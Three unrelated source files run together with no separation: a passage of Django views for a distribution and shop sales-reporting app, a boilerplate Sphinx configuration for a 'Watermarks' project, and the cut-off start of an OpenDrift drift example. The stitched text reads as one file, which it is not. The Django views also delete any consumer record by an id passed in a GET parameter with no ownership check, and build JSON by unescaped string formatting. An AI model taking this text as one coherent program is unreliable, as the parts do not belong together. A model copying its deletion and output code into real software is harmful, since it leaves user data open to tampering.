    all_user_for_base = Consumer.objects.all()
    transcriber_name = request.session['user']
    shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
    all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)

    return render(request, 'print/report_due.html', {'shop_list_base': all_shop_for_base,
                                                     'sell_transaction_with_due': sell_transaction_with_due,
                                                     'buy_transaction_with_due': buy_transaction_with_due,
                                                     'buyer_account': buyer_account,
                                                     'all_consumer_for_base' :all_consumer_for_base,
                                                     'bangla': bangla,
                                                     'seller_account': seller_account,
                                                     'transcriber_name': transcriber_name,
                                                     'shop_name': shop_name,
                                                     'all_user_for_base': all_user_for_base})


@login_required(login_url='/login/')
def report_payment_print(request):
    get_data = request.GET
    if 'ban' in get_data:
        bangla = True
    else:
        bangla = False

    shop_name = get_data['shop']
    shop_object = Consumer.objects.get(name=shop_name)
    sell_transaction_with_due = Transaction.objects.filter(seller_id=shop_object, total_due__lte=0)
    buy_transaction_with_due = Transaction.objects.filter(buyer_id=shop_object, total_due__lte=0)
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
    buyer_account = BuyerSellerAccount.objects.filter(seller=shop_object,  total_due__lte=0)
    seller_account = BuyerSellerAccount.objects.filter(buyer=shop_object,  total_due__lte=0)
    all_user_for_base = Consumer.objects.all()
    transcriber_name = request.session['user']
    shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
    all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)

    return render(request, 'print/report_payment.html', {'shop_list_base': all_shop_for_base,
                                                         'sell_transaction_with_due': sell_transaction_with_due,
                                                         'buy_transaction_with_due': buy_transaction_with_due,
                                                         'all_consumer_for_base' :all_consumer_for_base,
                                                         'buyer_account': buyer_account,
                                                         'transcriber_name': transcriber_name,
                                                         'seller_account': seller_account,
                                                         'shop_name': shop_name,
                                                         'bangla': bangla,
                                                         'all_user_for_base': all_user_for_base})


@login_required(login_url='/login/')
def report_product_print(request):

    get_data = request.GET
    shop_name = get_data['shop']
    if 'ban' in get_data:
        bangla = True
    else:
        bangla = False
    shop_object = Consumer.objects.get(name=shop_name)
    shop_inventory = Inventory.objects.filter(shop=shop_object)
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    selected_products = ProductsInTransaction.objects.filter(TID=Transaction.objects.filter(seller=shop_object))

    selected_products_buy = ProductsInTransaction.objects.filter(TID=Transaction.objects.filter(buyer=shop_object))
    all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
    all_user_for_base = Consumer.objects.all()
    transcriber_name = request.session['user']
    shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
    all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)

    return render(request, 'print/report_product.html', {'shop_list_base': all_shop_for_base,
                                                         'shop_inventory': shop_inventory,
                                                         'shop_name': shop_name,
                                                         'bangla': bangla,
                                                         'all_consumer_for_base' :all_consumer_for_base,
                                                         'transcriber_name': transcriber_name,
                                                         'selected_products_buy': selected_products_buy,
                                                         'selected_products': selected_products,
                                                         'all_user_for_base': all_user_for_base})


@login_required(login_url='/login/')
def report_sales_analysis_print(request):
    get_data = request.GET
    shop_name = get_data['shop']
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
    all_user_for_base = Consumer.objects.all()
    shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
    all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)

    transcriber_name = request.session['user']
    return render(request, 'print/report_sales_analysis.html', {'shop_list_base': all_shop_for_base,
                                                                'all_consumer_for_base' :all_consumer_for_base,
                                                                'shop_name': shop_name,
                                                                'transcriber_name': transcriber_name,
                                                                'all_user_for_base': all_user_for_base})


@login_required(login_url='/login/')
def report_profit_print(request):
    get_data = request.GET
    shop_name = get_data['shop']
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
    all_user_for_base = Consumer.objects.all()
    transcriber_name = request.session['user']
    shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
    all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)

    return render(request, 'print/report_profit.html', {'shop_list_base': all_shop_for_base,
                                                        'shop_name': shop_name,
                                                        'all_consumer_for_base':all_consumer_for_base,
                                                        'transcriber_name': transcriber_name,
                                                        'all_user_for_base': all_user_for_base})


@login_required(login_url='/login/')
def report_transcriber_performance_print(request):
    all_product = Product.objects.all()
    add_notification = False
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
    all_user_for_base = Consumer.objects.all()
    transcriber_name = request.session['user']
    shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
    all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)

    return render(request, 'print/report_transcriber_performance.html',
                  {'all_product': all_product, 'add_notification': add_notification,
                   'all_consumer_for_base':all_consumer_for_base,
                   'transcriber_name': transcriber_name,
                   'shop_list_base': all_shop_for_base, 'all_user_for_base': all_user_for_base})


# SR section

@login_required(login_url='/login/')
def sr_monthly_report(request):
    sr_name = request.session['user']
    sr_object = ACL.objects.get(loginID=sr_name).loginUser
    transcriber_name = sr_object.name
    allTransaction = BuyerSellerAccount.objects.filter(seller=sr_object)

    return render(request, 'pages/SR/report_monthly.html', {'transcriber_name': transcriber_name,
                                                            'allTransaction': allTransaction})


@login_required(login_url='/login/')
def sr_due_report(request):
    sr_name = request.session['user']
    sr_object = ACL.objects.get(loginID=sr_name).loginUser
    transcriber_name = sr_object.name
    allBalance = BuyerSellerAccount.objects.filter(seller=sr_object)
    sell_transaction = Transaction.objects.filter(seller=sr_object)
    dueTransactions = dueTransaction.objects.filter(seller=sr_object)

    return render(request, 'pages/SR/report_due.html', {'transcriber_name': transcriber_name,
                                                        'sell_transaction': sell_transaction,
                                                        'dueTransactions': dueTransactions,
                                                        'allBalance': allBalance})


@login_required(login_url='/login/')
def sr_report_sales_analysis(request):
    sr_name = request.session['user']
    sr_object = ACL.objects.get(loginID=sr_name).loginUser
    transcriber_name = sr_object.name

    post_data = request.POST
    print(post_data)
    shop_object = sr_object
    shop_name = shop_object.name
    shop_id = shop_object.id
    if 'month' in post_data and 'year' in post_data:
        month = post_data['month']
        year = post_data['year']
    else:
        month = datetime.date.today().month
        year = datetime.date.today().year
    return render(request, 'pages/SR/report_sales_analysis.html', {'shop_name': shop_name,
                                                                   # 'all_consumer_for_base' :all_consumer_for_base,
                                                                   'shop_id': shop_id,
                                                                   # 'bangla': bangla,
                                                                   'transcriber_name': transcriber_name,
                                                                   'month': month,
                                                                   'year': year})


@login_required(login_url='/login/')
def sr_report_sales_analysis_json(request):
    get_data = request.GET
    shop_name = get_data['shop']
    shop_object = Consumer.objects.get(id=shop_name)

    shop_inventory = BuySellProfitInventoryIndividual.objects.filter(shop=shop_object)
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    this_year = get_data['year']
    print(this_year)
    this_month = get_data['month']
    output = '{"data": [ '

    if get_data['t'] == '1':
        rank = 1
        for a_product in Product.objects.all():
            count = 0
            product_price = 0
            product_name = a_product.name
            for this_day_transaction in Transaction.objects.filter(seller=shop_object, DateAdded__year=this_year,
                                                                   DateAdded__month=this_month):
                # start counting for this product
                for product_in_this_transaction in ProductsInTransaction.objects.filter(TID=this_day_transaction):
                    if product_in_this_transaction.product == a_product:
                        if product_in_this_transaction.unit == a_product.bulk_wholesale_unit:
                            if a_product.bulk_to_retail_unit == 0:
                                count = count + product_in_this_transaction.quantity
                                product_price = product_price + product_in_this_transaction.price_per_unit
                            else:
                                count = count + product_in_this_transaction.quantity * a_product.bulk_to_retail_unit
                                product_price = product_price + product_in_this_transaction.price_per_unit / a_product.bulk_to_retail_unit
                        else:
                            count = count + product_in_this_transaction.quantity
                            product_price = product_price + product_in_this_transaction.price_per_unit

            if count > 0:
                output += '["%s","%s","%s"] ,' % (rank, product_name, str(count) + ' ' + a_product.retail_unit)
                rank += 1
    if get_data['t'] == '2':
        rank = 1
        for a_product in Product.objects.all():
            count = 0
            # product_price = 0
            previous_product_price = 0
            change = 0
            product_name = a_product.name
            for this_day_transaction in Transaction.objects.filter(seller=shop_object):
                # start counting for this product
                for product_in_this_transaction in ProductsInTransaction.objects.filter(TID=this_day_transaction):
                    if product_in_this_transaction.product == a_product:
                        if count == 0:
                            previous_product_price = product_in_this_transaction.price_per_unit
                        product_price = product_in_this_transaction.price_per_unit
                        change += abs(previous_product_price - product_price)
                        count += 1
            if count > 0:
                output += '["%s","%s","%s","%s"] ,' % (rank, product_name, count,
                                                       change/count)
                rank += 1
    if get_data['t'] == '3':

        print(this_month)
        day = 1
        #
        # output += '["%s/%s/%s","","","",""] ,' % (day, this_month, this_year)
        while day < 32:
            day_string = True
            rank = 1
            for a_product in Product.objects.all():
                count = 0
                product_price = 0
                product_name = a_product.name

                for this_day_transaction in Transaction.objects.filter(seller=shop_object, DateAdded__year=this_year,
                                                                       DateAdded__month=this_month, DateAdded__day=day):
                    # start counting for this product

                    for product_in_this_transaction in ProductsInTransaction.objects.filter(TID=this_day_transaction):

                        if product_in_this_transaction.product == a_product:
                            if product_in_this_transaction.unit == a_product.bulk_wholesale_unit:
                                if a_product.bulk_to_retail_unit == 0:
                                    count = count + product_in_this_transaction.quantity
                                    product_price = product_price + product_in_this_transaction.price_per_unit
                                else:
                                    count = count + product_in_this_transaction.quantity * a_product.bulk_to_retail_unit
                                    product_price = product_price + product_in_this_transaction.price_per_unit / a_product.bulk_to_retail_unit
                            else:
                                count = count + product_in_this_transaction.quantity
                                product_price = product_price + product_in_this_transaction.price_per_unit

                if count > 0:
                    if day_string:
                        output += '["%s/%s/%s","","","",""] ,' % (day, this_month, this_year)
                        day_string = False
                    output += '["","%s","%s","%s","%s"] ,' % (rank, product_name,
                                                              str(count) + ' ' + a_product.retail_unit,
                                                              float(product_price / count))
                    rank += 1
            day += 1
            # output += '["%s/%s/%s","","","",""] ,' % (day, this_month, this_year)
    if get_data['t'] == '4':
        day = 1

        # output += '["%s/%s/%s","","","",""] ,' % (day, this_month, this_year)
        while day < 8:
            day_string = True
            rank = 1
            for a_product in Product.objects.all():
                count = 0
                product_price = 0
                product_name = a_product.name

                for this_day_transaction in Transaction.objects.filter(seller=shop_object, DateAdded__week_day=day):
                    # start counting for this product

                    for product_in_this_transaction in ProductsInTransaction.objects.filter(TID=this_day_transaction):

                        if product_in_this_transaction.product == a_product:
                            if product_in_this_transaction.unit == a_product.bulk_wholesale_unit:
                                if a_product.bulk_to_retail_unit == 0:
                                    count = count + product_in_this_transaction.quantity
                                    product_price = product_price + product_in_this_transaction.price_per_unit
                                else:
                                    count = count + product_in_this_transaction.quantity * a_product.bulk_to_retail_unit
                                    product_price = product_price + product_in_this_transaction.price_per_unit / a_product.bulk_to_retail_unit
                            else:
                                count = count + product_in_this_transaction.quantity
                                product_price = product_price + product_in_this_transaction.price_per_unit

                if count > 0:
                    if day_string:
                        if day == 1:
                            output += '["%s","","","",""] ,' % 'Sunday'
                        elif day == 2:
                            output += '["%s","","","",""] ,' % 'Monday'
                        elif day == 3:
                            output += '["%s","","","",""] ,' % 'Tuesday'
                        elif day == 4:
                            output += '["%s","","","",""] ,' % 'Wednesday'
                        elif day == 5:
                            output += '["%s","","","",""] ,' % 'Thursday'
                        elif day == 6:
                            output += '["%s","","","",""] ,' % 'Friday'
                        elif day == 7:
                            output += '["%s","","","",""] ,' % 'Saturday'
                        day_string = False
                    output += '["","%s","%s","%s","%s"] ,' % (rank, product_name,
                                                              str(count) + ' ' + a_product.retail_unit,
                                                              float(product_price / count))
                    rank += 1
            day += 1
    if get_data['t'] == '5':
        this_year = datetime.date.today().year
        day_string = True
        for a_product in Product.objects.all():
            count = 0
            product_profit = 0
            product_name = a_product.name
            for this_day_transaction in BuySellProfitInventoryIndividual.objects.filter(shop_id=shop_object):
                # start counting for this product
                if this_day_transaction.product == a_product:
                    product_profit += this_day_transaction.profit
                    count += 1
            output += '["%s","%s"] ,' % (product_name, product_profit)
    output = output[:-1]
    output += ']}'
    return HttpResponse(output, content_type="text/plain")


# Distributor Section

@login_required(login_url='/login/')
def add_sr_page(request):
    dr_name = request.session['user']
    dr_object = ACL.objects.get(loginID=dr_name).loginUser
    transcriber_name = dr_object.name

    all_subscriber = ACL.objects.filter(distUser=dr_object)
    # type_of_subscriber = ConsumerType.objects.all()
    add_notification = False
    # shop_consumer = ConsumerType.objects.get(type_name='Seller')
    # all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
    # all_user_for_base = Consumer.objects.all()
    # transcriber_name = request.session['user']
    # shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
    # all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)
    notification = ''
    if 'delete' in request.GET:
        get_data = request.GET
        add_notification = True
        delID = get_data['delete']
        if Consumer.objects.filter(id=delID).exists():
            item_for_delete = Consumer.objects.get(id=delID)
            notification = 'The Consumer : ' + item_for_delete.name + ' is deleted successfully.'
            item_for_delete.delete()
        else:
            notification = 'Item not found'

    return render(request, 'pages/Distributor/add_SR.html',
                  {'subscribers': all_subscriber,'add_notification': add_notification,
                   # 'shop_list_base': all_shop_for_base,
                   # 'all_consumer_for_base' :all_consumer_for_base,
                   'transcriber_name': transcriber_name,
                   'notification': notification})


@login_required(login_url='/login/')
def dr_monthly_report(request):
    dr_name = request.session['user']
    dr_object = ACL.objects.get(loginID=dr_name).loginUser
    transcriber_name = dr_object.name
    transcriber_id = dr_object.id
    all_subscriber = ACL.objects.filter(distUser=dr_object)
    post_data = request.POST
    print(post_data)
    if 'sr' in post_data:
        sr_object = Consumer.objects.get(id=post_data['sr'])
        allTransaction = BuyerSellerAccount.objects.filter(seller=sr_object)
        return render(request, 'pages/Distributor/report_monthly.html', {'transcriber_name': transcriber_name,
                                                                         'hasReport': True,
                                                                         'subscribers': all_subscriber,
                                                                         'transcriber_id': transcriber_id,
                                                                         'allTransaction': allTransaction})
    else:
        # allTransaction = BuyerSellerAccount.objects.filter(seller=sr_object)
        return render(request, 'pages/Distributor/report_monthly.html', {'transcriber_name': transcriber_name,
                                                                         'transcriber_id': transcriber_id,
                                                                         'subscribers': all_subscriber,
                                                                         'hasReport': False})


@login_required(login_url='/login/')
def dr_due_report(request):
    sr_name = request.session['user']
    dr_object = ACL.objects.get(loginID=sr_name).loginUser
    transcriber_name = dr_object.name
    transcriber_id = dr_object.id
    all_subscriber = ACL.objects.filter(distUser=dr_object)
    post_data = request.POST
    if 'sr' in post_data:
        sr_object = Consumer.objects.get(id=post_data['sr'])
        allBalance = BuyerSellerAccount.objects.filter(seller=sr_object)
        sell_transaction = Transaction.objects.filter(seller=sr_object)
        dueTransactions = dueTransaction.objects.filter(seller=sr_object)
        # allTransaction = BuyerSellerAccount.objects.filter(seller=sr_object)
        return render(request, 'pages/Distributor/report_due.html', {'transcriber_name': transcriber_name,
                                                                     'sell_transaction': sell_transaction,
                                                                     'dueTransactions': dueTransactions,
                                                                     'transcriber_id': transcriber_id,
                                                                     'hasReport': True,
                                                                     'subscribers': all_subscriber,
                                                                     'allBalance': allBalance})

    else:
        # allTransaction = BuyerSellerAccount.objects.filter(seller=sr_object)
        return render(request, 'pages/Distributor/report_due.html', {'transcriber_name': transcriber_name,
                                                                     'transcriber_id': transcriber_id,
                                                                     'subscribers': all_subscriber,
                                                                     'hasReport': False})



@login_required(login_url='/login/')
def dr_report_sales_analysis(request):
    dr_name = request.session['user']
    dr_object = ACL.objects.get(loginID=dr_name).loginUser
    transcriber_name = dr_object.name
    transcriber_id = dr_object.id
    post_data = request.POST
    print(post_data)
    # shop_object = sr_object
    #
    all_subscriber = ACL.objects.filter(distUser=dr_object)
    hasReport = False
    if 'sr' in post_data:
        shop_id = post_data['sr']
        shop_name = Consumer.objects.get(id=shop_id).name
        hasReport = True
        if 'month' in post_data and 'year' in post_data:
            month = post_data['month']
            year = post_data['year']
        else:
            month = datetime.date.today().month
            year = datetime.date.today().year
        return render(request, 'pages/Distributor/report_sales_analysis.html', {'shop_name': shop_name,
                                                                                'transcriber_id': transcriber_id,
                                                                                'shop_id': shop_id,
                                                                                'subscribers': all_subscriber,
                                                                                'transcriber_name': transcriber_name,
                                                                                'month': month,
                                                                                'hasReport': hasReport,
                                                                                'year': year})
    else:
        return render(request, 'pages/Distributor/report_sales_analysis.html', {'shop_name': 'Not Selected',
                                                                                'transcriber_id': transcriber_id,
                                                                                'subscribers': all_subscriber,
                                                                                'transcriber_name': transcriber_name,
                                                                                'hasReport': hasReport})


# Shop Module

@login_required(login_url='/login/')
def shop_monthly_report(request):
    sr_name = request.session['user']
    sr_object = ACL.objects.get(loginID=sr_name).loginUser
    transcriber_name = sr_object.name
    allTransaction = BuyerSellerAccount.objects.filter(seller=sr_object)
    allTransactionIn = BuyerSellerAccount.objects.filter(buyer=sr_object)

    return render(request, 'pages/Shop/report_monthly.html', {'transcriber_name': transcriber_name,
                                                              'allTransactionIn': allTransactionIn,
                                                              'allTransaction': allTransaction})


@login_required(login_url='/login/')
def shop_due_report(request):
    sr_name = request.session['user']
    sr_object = ACL.objects.get(loginID=sr_name).loginUser
    transcriber_name = sr_object.name
    allBalance = BuyerSellerAccount.objects.filter(seller=sr_object)
    sell_transaction = Transaction.objects.filter(seller=sr_object)
    dueTransactions = dueTransaction.objects.filter(seller=sr_object)
    allBalanceIn = BuyerSellerAccount.objects.filter(buyer=sr_object)
    sell_transactionIn = Transaction.objects.filter(buyer=sr_object)
    dueTransactionsIn = dueTransaction.objects.filter(buyer=sr_object)

    return render(request, 'pages/Shop/report_due.html', {'transcriber_name': transcriber_name,
                                                          'sell_transaction': sell_transaction,
                                                          'dueTransactions': dueTransactions,
                                                          'allBalance': allBalance,
                                                          'sell_transactionIn': sell_transactionIn,
                                                          'dueTransactionsIn': dueTransactionsIn,
                                                          'allBalanceIn': allBalanceIn})

@login_required(login_url='/login/')
def shop_report_sales_analysis(request):
    sr_name = request.session['user']
    sr_object = ACL.objects.get(loginID=sr_name).loginUser
    transcriber_name = sr_object.name

    post_data = request.POST
    print(post_data)
    shop_object = sr_object
    shop_name = shop_object.name
    shop_id = shop_object.id
    if 'month' in post_data and 'year' in post_data:
        month = post_data['month']
        year = post_data['year']
    else:
        month = datetime.date.today().month
        year = datetime.date.today().year
    return render(request, 'pages/Shop/report_sales_analysis.html', {'shop_name': shop_name,
                                                                     # 'all_consumer_for_base' :all_consumer_for_base,
                                                                     'shop_id': shop_id,
                                                                     # 'bangla': bangla,
                                                                     'transcriber_name': transcriber_name,
                                                                     'month': month,
                                                                     'year': year})

# Consumer Module

@login_required(login_url='/login/')
def user_monthly_report(request):
    sr_name = request.session['user']
    sr_object = ACL.objects.get(loginID=sr_name).loginUser
    transcriber_name = sr_object.name
    # allTransaction = BuyerSellerAccount.objects.filter(seller=sr_object)
    allTransactionIn = BuyerSellerAccount.objects.filter(buyer=sr_object)

    return render(request, 'pages/Consumer/report_monthly.html', {'transcriber_name': transcriber_name,
                                                                  'allTransactionIn': allTransactionIn})


@login_required(login_url='/login/')
def user_due_report(request):
    sr_name = request.session['user']
    sr_object = ACL.objects.get(loginID=sr_name).loginUser
    transcriber_name = sr_object.name
    # allBalance = BuyerSellerAccount.objects.filter(seller=sr_object)
    # sell_transaction = Transaction.objects.filter(seller=sr_object)
    # dueTransactions = dueTransaction.objects.filter(seller=sr_object)
    allBalanceIn = BuyerSellerAccount.objects.filter(buyer=sr_object)
    sell_transactionIn = Transaction.objects.filter(buyer=sr_object)
    dueTransactionsIn = dueTransaction.objects.filter(buyer=sr_object)

    return render(request, 'pages/Consumer/report_due.html', {'transcriber_name': transcriber_name,
                                                              # 'sell_transaction': sell_transaction,
                                                              # 'dueTransactions': dueTransactions,
                                                              # 'allBalance': allBalance,
                                                              'sell_transactionIn': sell_transactionIn,
                                                              'dueTransactionsIn': dueTransactionsIn,
                                                              'allBalanceIn': allBalanceIn})


@login_required(login_url='/login/')
def change_password(request):
    # user = request.session['user']
    post_data = request.POST

    user_name = request.session['user']
    user_object = ACL.objects.get(loginID=user_name).loginUser
    transcriber_name = user_object.name
    user = user_object.phone[-9:]
    wrong = False
    text = ''

    if 'csrfmiddlewaretoken' in post_data:
        if post_data['password'] == post_data['re-password']:
            if User.objects.filter(username=user).exists():
                u = User.objects.get(username=user)
                u.set_password(post_data['password'])
                u.save()

                user_ID = user_object.id
                this_user = Consumer.objects.get(id=user_ID)
                this_user.number_of_child = 'CHANGED !!!'
                this_user.save()
                wrong = True
                text = 'Password is successfully changed'
                if user_object.type.type_name == 'Distributor':
                    display = render(request, 'pages/Distributor/index.html', {'transcriber_name': transcriber_name,
                                                                               'wrong': wrong,
                                                                               'text': text})
                elif user_object.type.type_name == 'SR':
                    display = render(request, 'pages/SR/index.html', {'transcriber_name': transcriber_name,
                                                                      'wrong': wrong,
                                                                      'text': text})
                elif user_object.type.type_name == 'Seller':
                    display = render(request, 'pages/Shop/index.html', {'transcriber_name': transcriber_name,
                                                                        'wrong': wrong,
                                                                        'text': text})
                elif user_object.type.type_name == 'Buyer':
                    display = render(request, 'pages/Consumer/index.html', {'transcriber_name': transcriber_name,
                                                                            'wrong': wrong,
                                                                            'text': text})
            else:
                wrong = True
                text = 'Something Wrong'
                if user_object.type.type_name == 'Distributor':
                    display = render(request, 'pages/Distributor/change_password.html', {'transcriber_name': transcriber_name,
                                                                                         'wrong': wrong,
                                                                                         'text': text})
                elif user_object.type.type_name == 'SR':
                    display = render(request, 'pages/SR/change_password.html', {'transcriber_name': transcriber_name,
                                                                                'wrong': wrong,
                                                                                'text': text})
                elif user_object.type.type_name == 'Seller':
                    display = render(request, 'pages/Shop/change_password.html', {'transcriber_name': transcriber_name,
                                                                                  'wrong': wrong,
                                                                                  'text': text})
                elif user_object.type.type_name == 'Buyer':
                    display = render(request, 'pages/Consumer/change_password.html', {'transcriber_name': transcriber_name,
                                                                                      'wrong': wrong,
                                                                                      'text': text})
        else:
            wrong = True
            text = 'Passwords do NOT match. Please try again'
            if user_object.type.type_name == 'Distributor':
                display = render(request, 'pages/Distributor/change_password.html', {'transcriber_name': transcriber_name,
                                                                                     'wrong': wrong,
                                                                                     'text': text})
            elif user_object.type.type_name == 'SR':
                display = render(request, 'pages/SR/change_password.html', {'transcriber_name': transcriber_name,
                                                                            'wrong': wrong,
                                                                            'text': text})
            elif user_object.type.type_name == 'Seller':
                display = render(request, 'pages/Shop/change_password.html', {'transcriber_name': transcriber_name,
                                                                              'wrong': wrong,
                                                                              'text': text})
            elif user_object.type.type_name == 'Buyer':
                display = render(request, 'pages/Consumer/change_password.html', {'transcriber_name': transcriber_name,
                                                                                  'wrong': wrong,
                                                                                  'text': text})
    else:
        wrong = False
        if user_object.type.type_name == 'Distributor':
            display = render(request, 'pages/Distributor/change_password.html', {'transcriber_name': transcriber_name,
                                                                                 'wrong': wrong,
                                                                                 'text': text})
        elif user_object.type.type_name == 'SR':
            display = render(request, 'pages/SR/change_password.html', {'transcriber_name': transcriber_name,
                                                                        'wrong': wrong,
                                                                        'text': text})
        elif user_object.type.type_name == 'Seller':
            display = render(request, 'pages/Shop/change_password.html', {'transcriber_name': transcriber_name,
                                                                          'wrong': wrong,
                                                                          'text': text})
        elif user_object.type.type_name == 'Buyer':
            display = render(request, 'pages/Consumer/change_password.html', {'transcriber_name': transcriber_name,
                                                                              'wrong': wrong})

    return display

# -*- coding: utf-8 -*-
#
# Watermarks documentation build configuration file, created by
# sphinx-quickstart on Tue Apr  8 16:49:39 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.

import sys
import os

src_dir = os.path.join(os.path.dirname(__file__), '..', '..', 'src')
sys.path.insert(0, src_dir)
import watermarks


# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))

# -- General configuration ------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'

# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
    'sphinx.ext.autodoc',
]

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix of source filenames.
source_suffix = '.rst'

# The encoding of source files.
#source_encoding = 'utf-8-sig'

# The master toctree document.
master_doc = 'index'

# General information about the project.
project = u'Watermarks'
copyright = u'2014, Vladimir Chovanec'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = watermarks.__version__
# The full version, including alpha/beta/rc tags.
release = watermarks.__version__

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None

# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []

# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None

# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True

# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True

# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'

# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []

# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False


# -- Options for HTML output ----------------------------------------------

# The theme to use for HTML and HTML Help pages.  See the documentation for
# a list of builtin themes.
html_theme = 'default'

# Theme options are theme-specific and customize the look and feel of a theme
# further.  For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}

# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []

# The name for this set of Sphinx documents.  If None, it defaults to
# "<project> v<release> documentation".
#html_title = None

# A shorter title for the navigation bar.  Default is the same as html_title.
#html_short_title = None

# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None

# The name of an image file (within the static path) to use as favicon of the
# docs.  This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']

# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []

# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'

# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True

# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}

# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}

# If false, no module index is generated.
#html_domain_indices = True

# If false, no index is generated.
#html_use_index = True

# If true, the index is split into individual pages for each letter.
#html_split_index = False

# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True

# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True

# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True

# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it.  The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''

# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None

# Output file base name for HTML help builder.
htmlhelp_basename = 'Watermarksdoc'


# -- Options for LaTeX output ---------------------------------------------

latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',

# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',

# Additional stuff for the LaTeX preamble.
#'preamble': '',
}

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
#  author, documentclass [howto, manual, or own class]).
latex_documents = [
  ('index', 'Watermarks.tex', u'Watermarks Documentation',
   u'Vladimir Chovanec', 'manual'),
]

# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None

# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False

# If true, show page references after internal links.
#latex_show_pagerefs = False

# If true, show URL addresses after external links.
#latex_show_urls = False

# Documents to append as an appendix to all manuals.
#latex_appendices = []

# If false, no module index is generated.
#latex_domain_indices = True


# -- Options for manual page output ---------------------------------------

# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    ('index', 'watermarks', u'Watermarks Documentation',
     [u'Vladimir Chovanec'], 1)
]

# If true, show URL addresses after external links.
#man_show_urls = False


# -- Options for Texinfo output -------------------------------------------

# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
  ('index', 'Watermarks', u'Watermarks Documentation',
   u'Vladimir Chovanec', 'Watermarks', 'One line description of project.',
   'Miscellaneous'),
]

# Documents to append as an appendix to all manuals.
#texinfo_appendices = []

# If false, no module index is generated.
#texinfo_domain_indices = True

# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'

# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False

#!/usr/bin/env python
"""
Grid time
=============
"""

from datetime import timedelta
import numpy as np
from opendrift.readers import reader_global_landmask
from opendrift.readers import reader_netCDF_CF_generic
from opendrift.models.oceandrift import OceanDrift

# Seeding at a grid at regular interval
o = OceanDrift(loglevel=20)  # Set loglevel to 0 for debug information

